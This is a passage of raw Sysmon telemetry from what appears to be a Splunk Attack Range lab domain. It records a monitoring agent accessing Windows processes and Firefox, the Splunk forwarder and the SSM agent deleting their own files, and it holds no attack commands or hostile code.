Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.810{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\favicons.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.808{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\places.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.799{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000017342Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:14.122{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06B3E48BA76B9E069A8686B4C9BCCB56,SHA256=8D38ABB981F154BC5C2C5BE0B17E4E5A944B099D761EBA26039358563CC31256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017341Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:14.054{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-036MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.791{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003DBBB3E3E90) 10341000x800000000000000044828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.791{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003DBBB3E3E90) 10341000x800000000000000044827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.791{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003DBBB3E3E90) 10341000x800000000000000044826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.790{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003DBBB3E3E90) 23542300x800000000000000044825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.790{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.789{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.785{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.768{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\sessionstore-backups\recovery.jsonlz4MD5=D50DE813BC23661962480B5DE07808DD,SHA256=8DE67650BC2A6DA7C52274C6A509D23B1777A7A21CBAA725048AFBB4AD9624F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.767{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\sessionstore-backups\recovery.baklz4MD5=D8F4614E428CC64FD0FA3A270D4A177A,SHA256=9827EB1DF355752AC8B532EC1211F6CD8B12FDF64BCD61C7980C6DB0F64EDCA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.721{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program 